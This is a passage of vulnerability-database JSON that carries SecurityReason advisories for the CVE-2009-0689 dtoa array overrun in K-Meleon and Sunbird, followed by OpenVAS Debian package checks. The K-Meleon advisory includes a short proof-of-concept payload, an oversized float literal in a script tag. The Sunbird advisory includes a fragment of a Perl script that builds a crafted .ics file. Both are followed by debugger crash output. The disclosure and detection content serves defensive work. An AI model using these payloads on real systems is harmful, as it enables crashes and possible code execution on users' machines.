web/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4esACgkQpiCeOKaYa9bOkQCcDLKKqvSyE1ZJZebhBBiow8tV\nXqQAnR79bagErDfzJ3TV/MlLgrWXsGD7\n=/IkD\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:24", "description": "\nK-Meleon 1.5.3 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "K-Meleon 1.5.3 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:32D2B684D6A2AB9F4EF85B2B51DAB5DC", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - K-Meleon 1.5.3\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/72\n\n\n- --- 0.Description ---\nK-Meleon is an extremely fast, customizable, lightweight web browser\nbased on the Gecko layout engine developed by Mozilla which is also used\nby Firefox. K-Meleon is free, open source software released under the\nGNU General Public License and is designed specifically for Microsoft\nWindows (Win32) operating systems.\n\n\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. K-Meleon has the same\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\nFirefox 3.5.4 and fix\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nK-Meleon will crash with\n\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\nviolation reading location 0x0bc576ec.\n\n01800754 mov eax,dword ptr [ecx]\n\nEAX 00000002 \nECX 0BC576EC \nEDI 028FEB51 \n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\nPlease note:\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\nalgorithm is not optimal and allows remote Denial of Service in Firefox\n3.5.5 giving long float number.\n\n\n- --- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\n=Zqoe\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:50", "description": "\nSunbird 0.9 - Array Overrun Code Execution", "edition": 1, "published": "2009-12-11T00:00:00", "title": "Sunbird 0.9 - Array Overrun Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-11T00:00:00", "id": "EXPLOITPACK:D2EA9682808108DB6E2405A3FC3A4AF3", "href": "", "sourceData": "full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253\n\n[ Sunbird 0.9 Array Overrun (code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- Dis.: 07.05.2009\n- Pub.: 11.12.2009\n\nCVE: CVE-2009-0689\nCWE: CWE-199\nRisk: High\nRemote: Yes\n\nAffected Software:\n- Sunbird 0.9\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/77\n\n\n--- 0.Description ---\nMozilla Sunbird is a cross-platform calendar application, built upon\nMozilla Toolkit. Our goal is to provide you with a full-featured and\neasy to use calendar application that you can use around the world.\n\n\n--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. Sunbird has the same dtoa\nas Firefox, etc. Problem exist in js3250.dll (version 4.0.0 - Netscape\n32-bit JavaScript Module) DLL library\n\nand it is the same like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\nit is possible to call 16>test.ics');\nprint myfile $header.$s.$expl.$footer;\n-----------------------\n\n0:000> r\neax=015e06f9 ebx=00000001 ecx=658cebec edx=00000002 esi=015e0710\nedi=015e06f9\neip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00010206\njs3250!JS_strtod+0xb0a:\n600f154f 8b01 mov eax,dword ptr [ecx]\nds:0023:658cebec=????????\n0:000> ub 600f1551\njs3250!JS_strtod+0xaf2:\n600f1537 83c414 add esp,14h\n600f153a 8b75fc mov esi,dword ptr [ebp-4]\n600f153d e96bf5ffff jmp js3250!JS_strtod+0x68 (600f0aad)\n600f1542 56 push esi\n600f1543 57 push edi\n600f1544 8b7c240c mov edi,dword ptr [esp+0Ch]\n600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560\n(6014d008)[edi*4]\n600f154f 8b01 mov eax,dword ptr [ecx]\n0:000> !exchain\n0012fc9c: USER32!_except_handler3+0 (7e39048f)\nCRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d)\n0012fcf4: USER32!_except_handler3+0 (7e39048f)\nCRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a)\nfunc: USER32!DispatchMessageWorker+126 (7e390762)\n0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)\n0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)\n0012ffe0: kernel32!_except_handler3+0 (7c839ac0)\nCRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)\nfunc: kernel32!BaseProcessStart+3a (7c843898)\nInvalid exception stack at ffffffff\n0:000> k\nChildEBP RetAddr\nWARNING: Stack unwind information not available. Following frames may be\nwrong.\n0012e35c 600f15f3 js3250!JS_strtod+0xb0a\n0012e37c 600f0ef9 js3250!JS_strtod+0xbae\n0012e3f4 6010e8eb js3250!JS_strtod+0x4b4\n0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf\n0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa\n0012e5dc 6010195e js3250!js_Invoke+0x2c1b\n0012e694 60101cb2 js3250!js_Invoke+0x5c4\n0012e71c 60101e0a js3250!js_Invoke+0x918\n0012e74c 6011350d js3250!js_Invoke+0xa70\n0012e7a4 600e3c41 js3250!js_FindProperty+0x974\n0012e7bc 004274cf js3250!JS_SetProperty+0x36\n0012e978 0042593e sunbird!NS_RegistryGetFactory+0x1c585\n0012ea44 6035c7f1 sunbird!NS_RegistryGetFactory+0x1a9f4\n0012ea60 6035d30b xpcom_core!nsXPTCStubBase::Stub3+0x20\n0012ea74 00421fde xpcom_core!XPTC_InvokeByIndex+0x27\n0012ec2c 0041fe00 sunbird!NS_RegistryGetFactory+0x17094\n0012ecc0 60101906 sunbird!NS_RegistryGetFactory+0x14eb6\n0012ed80 60101cb2 js3250!js_Invoke+0x56c\n0012ee08 60101e0a js3250!js_Invoke+0x918\n0012ee38 6011350d js3250!js_Invoke+0xa70\n\n\n--- 3. SecurityReason Note ---\nOfficialy SREASONRES:20090625 has been detected in:\n- OpenBSD\n- NetBSD\n- FreeBSD\n- MacOSX\n- Google Chrome\n- Mozilla Firefox\n- Mozilla Seamonkey\n- Mozilla Thunderbird\n- Mozilla Sunbird\n- Mozilla Camino\n- KDE (example: konqueror)\n- Opera\n- K-Meleon\n- F-Lock\n\nThis list is not yet closed.\n\n\n--- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n--- 5. Credits ---\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\n\n\n--- 6. Greets ---\nInfospec p_e_a pi3\n\n\n--- 7. Contact ---\nEmail:\n- cxib {a.t] securityreason [d0t} com\n- sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:57:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "description": "The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.", "modified": "2017-07-07T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66211", "href": "http://plugins.openvas.org/nasl.php?oid=66211", "type": "openvas", "title": "Debian Security Advisory DSA 1931-1 (nspr)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1931_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1931-1 (nspr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2009-1563\n\nA programming error in the string handling code may lead to the\nexecution of arbitrary code.\n\nCVE-2009-2463\n\nAn integer overflow in the Base64 decoding functions may lead to\nthe execution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.8.2-1.\n\nWe recommend that you upgrade your NSPR packages.\";\ntag_summary = \"The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201931-1\";\n\n\nif(description)\n{\n script_id(66211);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2463\", \"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1931-1 (nspr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689", "CVE-2009-2463"], "description": "The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066211", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066211", "type": "openvas", "title": "Debian Security Advisory DSA 1931-1 (nspr)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1931_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1931-1 (nspr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2009-1563\n\nA programming error in the string handling code may lead to the\nexecution of arbitrary code.\n\nCVE-2009-2463\n\nAn integer overflow in the Base64 decoding functions may lead to\nthe execution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.8.2-1.\n\nWe recommend that you upgrade your NSPR packages.\";\ntag_summary = \"The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201931-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66211\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2463\", \"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1931-1 (nspr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) 